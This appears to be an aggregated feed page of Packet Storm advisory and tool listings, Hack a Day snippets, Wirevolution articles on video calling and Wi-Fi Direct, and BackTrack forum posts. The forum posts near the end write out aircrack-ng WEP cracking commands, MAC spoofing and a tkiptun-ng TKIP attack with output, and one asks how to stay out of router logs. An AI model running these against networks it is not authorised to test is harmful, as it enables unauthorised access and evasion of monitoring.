[Phillip Torrone] gave us a heads up about a project he and [Limor Fried] along with [Mike Doell] have just wrapped up. Their aptly-named “iCufflinks” softly pulsate with light the same way in which you see many Mac products do. The cufflinks are made from machined aluminum and have the ubiquitous “power symbol” milled into [...]
-
-
19:15
»
Packet Storm Security Advisories
Secunia Security Advisory - Two vulnerabilities have been reported in Microsoft Office for Mac, which can be exploited by malicious people to compromise a user's system.
-
19:34
»
Packet Storm Security Recent Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
19:34
»
Packet Storm Security Tools
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
19:34
»
Packet Storm Security Misc. Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
-
21:44
»
Packet Storm Security Advisories
Secunia Security Advisory - A vulnerability has been reported in Skype for Mac, which can be exploited by malicious people to compromise a user's system.
-
-
8:49
»
Packet Storm Security Advisories
iDefense Security Advisory 04.12.11 - Remote exploitation of a memory corruption vulnerability in Microsoft Corp.'s Excel could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when Excel parses a specially crafted Excel file. Specific values within this file can trigger a memory corruption vulnerability and may allow arbitrary code execution. The following Microsoft products are vulnerable: Excel 2002 SP3, Excel 2002 SP3, Excel 2003 SP3, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac.
-
8:49
»
Packet Storm Security Recent Files
iDefense Security Advisory 04.12.11 - Remote exploitation of a memory corruption vulnerability in Microsoft Corp.'s Excel could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when Excel parses a specially crafted Excel file. Specific values within this file can trigger a memory corruption vulnerability and may allow arbitrary code execution. The following Microsoft products are vulnerable: Excel 2002 SP3, Excel 2002 SP3, Excel 2003 SP3, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac.
-
8:49
»
Packet Storm Security Misc. Files
iDefense Security Advisory 04.12.11 - Remote exploitation of a memory corruption vulnerability in Microsoft Corp.'s Excel could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when Excel parses a specially crafted Excel file. Specific values within this file can trigger a memory corruption vulnerability and may allow arbitrary code execution. The following Microsoft products are vulnerable: Excel 2002 SP3, Excel 2002 SP3, Excel 2003 SP3, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac.
-
-
16:39
»
Packet Storm Security Recent Files
Monocle is a local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.
-
16:39
»
Packet Storm Security Tools
Monocle is a local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.
-
16:39
»
Packet Storm Security Misc. Files
Monocle is a local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.
-
-
11:05
»
Packet Storm Security Advisories
PRE-CERT Security Advisory - Both the 2.4 and 2.6 Linux kernels have multiple vulnerabilities. A buffer overflow bug in mac_partition in fs/partitions/mac.c (for MAC partition tables) allows for a denial-of-service (kernel panic) condition via a corrupted MAC partition table. A division-by-zero bug in ldm_get_vblks in fs/partitions/ldm.c (for LDM partition tables) allows a denial-of-service (kernel oops) condition via a corrupted LDM partition table. A buffer overflow bug in ldm_frag_add in fs/partitions/ldm.c (for LDM partition tables) may allow escalation of privileges or disclosure of sensitive information via a corrupted LDM partition table.
-
11:05
»
Packet Storm Security Recent Files
PRE-CERT Security Advisory - Both the 2.4 and 2.6 Linux kernels have multiple vulnerabilities. A buffer overflow bug in mac_partition in fs/partitions/mac.c (for MAC partition tables) allows for a denial-of-service (kernel panic) condition via a corrupted MAC partition table. A division-by-zero bug in ldm_get_vblks in fs/partitions/ldm.c (for LDM partition tables) allows a denial-of-service (kernel oops) condition via a corrupted LDM partition table. A buffer overflow bug in ldm_frag_add in fs/partitions/ldm.c (for LDM partition tables) may allow escalation of privileges or disclosure of sensitive information via a corrupted LDM partition table.
-
11:05
»
Packet Storm Security Misc. Files
PRE-CERT Security Advisory - Both the 2.4 and 2.6 Linux kernels have multiple vulnerabilities. A buffer overflow bug in mac_partition in fs/partitions/mac.c (for MAC partition tables) allows for a denial-of-service (kernel panic) condition via a corrupted MAC partition table. A division-by-zero bug in ldm_get_vblks in fs/partitions/ldm.c (for LDM partition tables) allows a denial-of-service (kernel oops) condition via a corrupted LDM partition table. A buffer overflow bug in ldm_frag_add in fs/partitions/ldm.c (for LDM partition tables) may allow escalation of privileges or disclosure of sensitive information via a corrupted LDM partition table.
-
-
11:11
»
Packet Storm Security Recent Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
11:11
»
Packet Storm Security Tools
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
11:11
»
Packet Storm Security Misc. Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
-
0:01
»
Packet Storm Security Tools
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
0:01
»
Packet Storm Security Misc. Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
-
17:18
»
Packet Storm Security Recent Files
Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks. It is possible to generate the default WEP/WPA key from the MAC address. This python code demonstrates the issue.
-
17:18
»
Packet Storm Security Misc. Files
Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks. It is possible to generate the default WEP/WPA key from the MAC address. This python code demonstrates the issue.
-
7:59
»
Packet Storm Security Recent Files
Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible "interesting" (cryptographically weak) logging, Secure SUID behavior, GPS devices and wireless devices fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
-
7:59
»
Packet Storm Security Tools
Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible "interesting" (cryptographically weak) logging, Secure SUID behavior, GPS devices and wireless devices fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
-
7:59
»
Packet Storm Security Misc. Files
Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible "interesting" (cryptographically weak) logging, Secure SUID behavior, GPS devices and wireless devices fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
-
-
9:10
»
Packet Storm Security Exploits
Remote attackers can gain sensitive information about a DD-WRT router and internal clients, including IP addresses, MAC addresses and host names. This information can be used for further network attacks as well as very accurate geolocation. This is exploitable even if remote administration is disabled. Version 24-preSP2 is affected.
-
9:10
»
Packet Storm Security Recent Files
Remote attackers can gain sensitive information about a DD-WRT router and internal clients, including IP addresses, MAC addresses and host names. This information can be used for further network attacks as well as very accurate geolocation. This is exploitable even if remote administration is disabled. Version 24-preSP2 is affected.
-
9:10
»
Packet Storm Security Misc. Files
Remote attackers can gain sensitive information about a DD-WRT router and internal clients, including IP addresses, MAC addresses and host names. This information can be used for further network attacks as well as very accurate geolocation. This is exploitable even if remote administration is disabled. Version 24-preSP2 is affected.
-
-
15:22
»
Wirevolution
Although phone numbers are an antiquated kind of thing, we are sufficiently beaten down by the machines that we think of it as natural to identify a person by a 10 digit number. Maybe the demise of the numeric phone keypad as big touch-screens take over will change matters on this front. But meanwhile, phone numbers are holding us back in important ways. Because phone numbers are bound to the PSTN, which doesn’t carry video calls, it is harder to make video calls than voice, because we don’t have people’s video addresses so handy.
This year, three new products attempted to address this issue in remarkably similar ways – clearly an idea whose time has come. The products are Apple’s FaceTime, Cisco’s IME and a startup product called Tango.
In all three of these products, you make a call to a regular phone number, which triggers a video session over the Internet. You only need the phone number – the Internet addressing is handled automatically. The two problems the automatic addressing has to handle are finding a candidate address, then verifying that it is the right one. Here’s how each of those three new products does the job:
1. FaceTime. When you first start FaceTime, it sends an SMS (text message) to an Apple server. The SMS contains sufficient information for the Apple server to reliably associate your phone number with the XMPP (push services) client running on your iPhone. With this authentication performed, anybody else who has your phone number in their address book on their iPhone or Mac can place a videophone call to you via FaceTime.
2. Cisco IME (Inter-Company Media Engine). The protocol used by IME to securely associate your phone number with your IP address is ViPR (Verification Involving PSTN Reachability), an open protocol specified in several IETF drafts co-authored by Jonathan Rosenberg who is now at Skype. ViPR can be embodied in a network box like IME, or in an endpoint like a phone of PC.
Here’s how it works: you make a phone call in the usual way. After you hang up, ViPR looks up the phone number you called to see if it is also ViPR-enabled. If it is, ViPR performs a secure mutual verification, by using proof-of-knowledge of the previous PSTN call as a shared secret. The next time you dial that phone number, ViPR makes the call through the Internet rather than through the phone network, so you can do wideband audio and video with no per-minute charge. A major difference between ViPR and FaceTime or Tango is that ViPR does not have a central registration server. The directory that ViPR looks up phone numbers in is stored in a distributed hash table (DHT). This is basically a distributed database with the contents stored across the network. Each ViPR participant contributes a little bit of storage to the network. The DHT itself defines an algorithm – called Chord – which describes how each node connects to other nodes, and how to look up information.
3. Tango, like FaceTime, has its own registration servers. The authentication on these works slightly differently. When you register with Tango, it looks in the address book on your iPhone for other registered Tango users, and displays them in your Tango address book. So if you already know somebody’s phone number, and that person is a registered Tango user, Tango lets you call them in video over the Internet.
-
-
13:00
»
Hack a Day
[Sprite_TM] cooked up an amazing hack by resurrecting a Mac SE using a Dockstar and ARM processor. The retro hardware had a bad mainboard thanks to the corrosive properties of a failed backup-battery. He had been wanting to do something with the Seagate Dockstar and decided it would find a nice home in the Mac. [...]
-
-
12:00
»
Hack a Day
Evil Mad Scientist Laboratories is preparing for Halloween with this standby-mode pumpkin. Inside there’s an LED plugging a hole that is drilled just to the skin of the gourd-like vegetable. It fades in and out similar to a sleeping Mac, using what we think is a vastly over-powered circuit based on an ATtiny2313 (1k of [...]
-
-
5:34
»
Hack a Day
[Enigma-penguin] built a tablet computer out of a Core2Duo Macbook circa 2007. The battery exploded, damaging the case and a few components inside. But there was hope for a new life as a tablet computer. He removed the screen and tested to make sure the computer would still function without it by using the video [...]
-
-
13:45
»
remote-exploit & backtrack
Hello, friends.
Do you know about any manner to increase the (allways short: 10 or so) number of Static DHCP List that routers use to have?
I am talking about the IP assignement that a certain MAC connecting to the local network will have.
Thanks :).
-
-
13:01
»
Packet Storm Security Tools
NMB Scanner scans the shares of a SMB network, using the NMB and SMB protocols. It is useful for acquiring information on a local area network for such purposes as security auditing. It can obtain such information as NMB/SMB/Windows hostname, IP address, IP hostname, ethernet MAC address, Windows username, NMB/SMB/Windows domain name, and master browser. It can discover all the NMB/SMB/Windows hosts on a local area network by using the hosts lists maintained by master browsers.
-
13:01
»
Packet Storm Security Recent Files
NMB Scanner scans the shares of a SMB network, using the NMB and SMB protocols. It is useful for acquiring information on a local area network for such purposes as security auditing. It can obtain such information as NMB/SMB/Windows hostname, IP address, IP hostname, ethernet MAC address, Windows username, NMB/SMB/Windows domain name, and master browser. It can discover all the NMB/SMB/Windows hosts on a local area network by using the hosts lists maintained by master browsers.
-
-
17:29
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2010-156 - The FT_Stream_EnterFrame function in base/ftstream.c in FreeType before 2.4.2 does not properly validate certain position values, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font file. Array index error in the t42_parse_sfnts function in type42/t42parse.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via negative size values for certain strings in FontType42 font files, leading to a heap-based buffer overflow. FreeType before 2.4.2 uses incorrect integer data types during bounds checking, which allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted font file. Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted Adobe Type 1 Mac Font File font. bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service via a crafted BDF font file, related to an attempted modification of a value in a static string. Unspecified vulnerability in FreeType 2.3.9, and other versions before 2.4.2, allows remote attackers to cause a denial of service via vectors involving nested Standard Encoding Accented Character calls, related to psaux.h, cffgload.c, cffgload.h, and t1decode.c.
-
17:29
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2010-157 - The FT_Stream_EnterFrame function in base/ftstream.c in FreeType before 2.4.2 does not properly validate certain position values, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font file. Array index error in the t42_parse_sfnts function in type42/t42parse.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via negative size values for certain strings in FontType42 font files, leading to a heap-based buffer overflow. FreeType before 2.4.2 uses incorrect integer data types during bounds checking, which allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted font file. Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted Adobe Type 1 Mac Font File font. bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service via a crafted BDF font file, related to an attempted modification of a value in a static string. The updated packages have been patched to correct these issues.
-
-
19:03
»
Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 64bit binary release.
-
19:03
»
Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 32bit binary release.
-
19:03
»
Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Mac OSX source release.
-
19:03
»
Packet Storm Security Recent Files
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 64bit binary release.
-
19:03
»
Packet Storm Security Recent Files
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 32bit binary release.
-
19:02
»
Packet Storm Security Recent Files
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Mac OSX source release.
-
-
22:51
»
Packet Storm Security Tools
Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible interesting (cryptographically weak) logging, Secure SUID behavior, GPS devices and wireless devices fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
-
18:35
»
SecuriTeam
A Denial of Service vulnerability was discovered in Skype for Mac.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
18:24
»
Wirevolution
A while back the Wi-Fi Alliance announced a new certification program, Wi-Fi Direct, which enables a PC to connect directly with other Wi-Fi devices without having to go through an Access Point.
The Wi-Fi certification process for Wi-Fi Direct is scheduled to be launched by the end of 2010, but there are already two pre-standard implementations of this concept, My Wi-Fi, an Intel product which ships in Centrino 2 systems, and Wireless Hosted Network which ships in all versions of Windows 7.
The Wi-Fi Direct driver makes a single Wi-Fi adapter on the PC look like two to the operating system: one ordinary one that associates with a regular Access Point, and a second acting as a “Virtual Access Point.” The virtual access point (Microsoft calls it a “SoftAP”) actually runs inside the Wi-Fi driver on the PC (labeled WPAN I/F in the Intel diagram below).
To the outside world the Wi-Fi adapter also looks like two devices, each with its own MAC address: one the PC just like without Wi-Fi Direct, and the other an access point. Devices that associate with that access point join the PC’s PAN (Personal Area Network).
This yields several benefits in various use cases.
I wrote a couple of years ago about how a company called Ozmo planned to use a Wi-Fi PAN to connect peripherals to PCs, replacing Bluetooth and proprietary wireless technologies. That plan has now come to fruition. Earlier this month Ozmo announced that it had received $10.8 million in additional funding, and this week it announced two major customers: Primax, a leading ODM of wireless mice, and NMB Technologies, a leading ODM of wireless keyboards.
Here’s a slide from one of their promotional presentations giving a comparison with Bluetooth and proprietary technologies:
The essence of Ozmo’s approach is low cost, multi-device, low bandwidth and low power consumption. Wi-Fi Direct has another use case that is high bandwidth, with no requirement for low power.
If you want to stream video from your PC to a monitor using traditional Wi-Fi (“infrastructure mode”) each packet goes from the PC to the access point, then from the access point to the TV, so it occupies the spectrum twice for each packet. Wi-Fi Direct effectively doubles the available throughput, since each packet flies through the ether only once, directly from the PC to the TV. But it actually does better than that. Supposing the PC and the TV are in the same room, but the access point is in a different room, the PC can transmit at much lower power. Another similar Wi-Fi Direct session can then happen in another room in the house. Without Wi-Fi direct the two sessions would have to share the access point, taking turns to use the spectrum. So we get increased aggregate throughput both from halving the number of packet transmissions, and from allowing simultaneous use of the spectrum by multiple sessions (if they are far enough apart).
A Wi-Fi buff would point out that you can already do all this with ad-hoc mode, but Wi-Fi Direct purports to be usable by mortals, and to work interoperably, neither of which could be said for ad-hoc mode until recently. In January Infinitec announced a new point-to-point video streaming product that claims to be easy to use and universally interoperable, that Engadget implies uses ad-hoc mode, though Google can’t find the words “ad hoc” on the Infinitec website.
Between the bandwidth extremes of mice and TVs, lie numerous other potential uses, like headsets (which Ozmo also supports); syncing phones, cameras and media players; and wireless printers.
-
-
9:04
»
Packet Storm Security Exploits
This Metasploit module exploits a stack buffer overflow vulnerability in the handling of the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft, the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as Office 2004 for Mac, are vulnerable. NOTE: The vulnerable code path is not reachable on versions of Windows prior to Windows Vista.
-
-
0:33
»
remote-exploit & backtrack
Bonjour a tous,:D
J'ai suivi pleins de post afin de craquer ma clé WEP, je suis parvenus à trouver la clé de ma livebox (merci a tout ceux qui on fais de nombreux post), mais ensuite je n'arrive pas a trouver sous Backtrack la façon de se connecté a Internet. Je n'ai pas essayé sous Windows (puisque sous Backtrack j'ai fait un macchanger) pour pouvoir récupérer la clé.
Je suppose que sous windows il va prendre m'a vrais mac et qu'il va me jeter puisque je n'ai pas la bonne mac. Maintenant vous allez me dire "essaye avant de poster", mais comme il était prêt de trois heures ce matin et qu'il fallait assurer au taf, je n'ai pas pris le temps de faire l'essai. Et en plus j'aime bien comprendre comment tous cela fonctionne.
Merci à vous pour vos réponses.
-
-
2:03
»
remote-exploit & backtrack
Hi guys.
I'll try to be thorough.
Following the recommendations of many posters here, I recently acquired an ALFA AWUS036H (rtl8187 driver) and am trying to break into my (own: I do not endorse illegal activity in any way) WEP-enabled router.
I am not in the habit of posting in forums for basic inquiries (as most information is on Google these days if one searches enough), but I find myself in need of assistance.
I am running BackTrack 4 final (released 11.01.2010) and issuing the following commands:
Code:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng --channel <X> --bssid <XXXX...> -w <path> wlan0
aireplay-ng -1 0 -e <XXXX...> -a <XXXX...> -h <XXXX...> wlan0
Filling in the stuff in <>, naturally.
However I fail to get the association succeded :-) message.
On the contrary, I get DeAuth'ed and I can't seem to understand why.
(In fact, it loops on:
Code:
Sending Authentication Request
Authentication successful
Sending Association Request
sometimes with [ACK], and sometimes with a "received a deauth packet!")
The aireplay-ng --test succeeds with 30/30 and I've tried the fake auth at various places around the house, with the same result. I've also disabled MAC filtering and tried variations of the aireplay-ng -1, such as the more detailed -1 attack on the aircrack wiki, and with -x 180 to limit packets, but to no avail.
The Association Succeeded :-) message has appeared briefly once however, after I macchanged my wlan0 to one of the connected PC's. The #/s rating jumped, and the ARP attack looked like it was working. I wasn't using keep-alive though and eventually got deauthed, and using the same mac address spoof associated no longer thereafter (rather, it gets deauth packets like mad).
I've read around and some other people have had similar problems, though I couldn't find a clear solution. If the answer to this has been posted elsewhere and I've missed it in my search, could someone please point me to it? Any help is appreciated.
-
-
13:11
»
remote-exploit & backtrack
I tried to crack a WEP network with BackTrack4 and my VAIO Z laptop.
My wireless card was:
Code:
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
I changed it to monitor mode:
Code:
root@bt:~# airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode enabled on mon0)
And then I test injection:
Code:
root@bt:~# aireplay-ng -9 mon0
20:59:17 Trying broadcast probe requests...
20:59:17 Injection is working!
20:59:19 Found 1 AP
20:59:19 Trying directed probe requests...
20:59:19 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
20:59:21 Ping (min/avg/max): 1.436ms/3.492ms/7.525ms Power: -57.70
20:59:21 30/30: 100%
Then I started collecting IVs:
Code:
root@bt:~# airodump-ng -c 6 --bssid 00:23:F8:84:31:1B -w output mon0
CH 6 ][ BAT: 21 mins ][ Elapsed: 15 mins ][ 2010-03-11 20:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:23:F8:84:31:1B -21 100 8943 178 0 6 54 WEP WEP OPN Shatel
BSSID STATION PWR Rate Lost Packets Probes
00:23:F8:84:31:1B 00:24:D6:11:62:18 0 0 - 1 0 411384
And then I made a fake authentication:
Code:
root@bt:~# macchanger -s mon0
Current MAC: 00:24:d6:11:62:18 (unknown)
root@bt:~# aireplay-ng -1 6000 -o 1 -q 10 -e Shatel -a 00:23:F8:84:31:1B -h 00:24:D6:11:62:18 mon0
21:17:45 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
21:17:45 Sending Authentication Request (Open System) [ACK]
21:17:45 Authentication successful
21:17:45 Sending Association Request [ACK]
21:17:45 Association successful :-) (AID: 1)
21:17:55 Sending keep-alive packet
And finally I started injection:
Code:
root@bt:~# aireplay-ng -3 -b 00:23:F8:84:31:1B -h 00:24:d6:11:62:18 mon0
20:36:51 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
Saving ARP requests in replay_arp-0311-203651.cap
You should also start airodump-ng to capture replies.
Read 10150 packets (got 45 ARP requests and 2 ACKs), sent 424647 packets...(500 pps)
But injection didn't make any change in the speed of collecting packets(#/s).
I did this again:
Code:
root@bt:~# aireplay-ng -9 mon0
21:22:49 Trying broadcast probe requests...
21:22:51 No Answer...
21:22:51 Found 3 APs
21:22:51 Trying directed probe requests...
21:22:51 00:27:19:D8:B0:C2 - channel: 6 - 'TP-LINK_D8B0C2'
21:22:57 0/30: 0%
21:22:57 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
21:23:03 0/30: 0%
21:23:03 00:80:48:3D:12:27 - channel: 6 - 'mecom.wifi.BG'
21:23:09 0/30: 0%
and it seems that injection is not working!
What should I do?! How can I collects IVs faster?!(now, it takes days[or weeks!] to collect enough packets!)
Thanks!
-
-
15:05
»
remote-exploit & backtrack
so that my computer as for my mac address does not appear on the routers DHCP table or any other data logs.
Thanks in advance.
-
5:54
»
remote-exploit & backtrack
Run TKIP keystream discovery attack:
root@bt:~# tkiptun-ng -a 00:18:39:D3:FB:A0 -h 00:1E:65:F8:BA:A8 -m 80 -n 100 wlan0
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
08:24:01 Michael Test: Successful
08:24:01 Waiting for beacon frame (BSSID: 00:18:39:D3:FB:A0) on channel 2
08:24:01 Found specified AP
08:24:01 WPA handshake: 00:18:39:D3:FB:A0 captured65:F8:BA:A8] [ 6| 3 ACKs]
08:24:01 Sending 4 directed DeAuth. STMAC: [00:1E:65:F8:BA:A8] [ 9| 6 ACKs]
08:24:02 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0329-082409.cap
08:24:09 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0329-082409.cap
08:24:09 Got the answer!
08:24:09 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.
08:24:31 Offset 81 ( 0% done) | xor = 49 | pt = 40 | 122 frames written in 100055ms
08:25:47 Offset 80 ( 2% done) | xor = 8B | pt = 2A | 155 frames written in 127108ms
08:27:03 Offset 79 ( 4% done) | xor = 39 | pt = 01 | 163 frames written in 133657ms
08:28:18 Offset 78 ( 7% done) | xor = 03 | pt = F4 | 144 frames written in 118079ms
08:29:34 Offset 77 ( 9% done) | xor = EF | pt = 6F | 157 frames written in 128742ms
08:30:42 Offset 76 (11% done) | xor = 76 | pt = 95 | 75 frames written in 61500ms
08:32:01 Offset 75 (14% done) | xor = BA | pt = 67 | 187 frames written in 153338ms
08:33:06 Offset 74 (16% done) | xor = 03 | pt = 14 | 54 frames written in 44279ms
08:34:25 Offset 73 (19% done) | xor = 02 | pt = A4 | 190 frames written in 155801ms
08:35:32 Offset 72 (21% done) | xor = F0 | pt = 3F | 67 frames written in 54943ms
08:36:52 Offset 71 (23% done) | xor = D5 | pt = 93 | 193 frames written in 158255ms
08:38:15 Offset 70 (26% done) | xor = 7D | pt = 1D | 230 frames written in 188622ms
Sleeping for 60 seconds.36 bytes still unknown
ARP Reply
Checking 192.168.x.y
08:38:15 Reversed MIC Key (FromDS): D6:16:91:B7:23:03:E4:25
Saving plaintext in replay_dec-0329-083815.cap
Saving keystream in replay_dec-0329-083815.xor
08:38:15
Completed in 836s (0.05 bytes/s)
08:38:15 AP MAC: 00:18:39:D3:FB:9E IP: 192.168.0.1
08:38:15 Client MAC: 00:1E:65:F8:BA:A8 IP: 192.168.0.103
08:38:15 Sent encrypted tkip ARP request to the client.
08:38:15 Wait for the mic countermeasure timeout of 60 seconds.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Sent 1172 packets, current guess: 8F...
Failure: got several deauthentication packets from the AP - you need to start the whole process all over again, as the client got disconnected.
root@bt:~#
Conclusions:
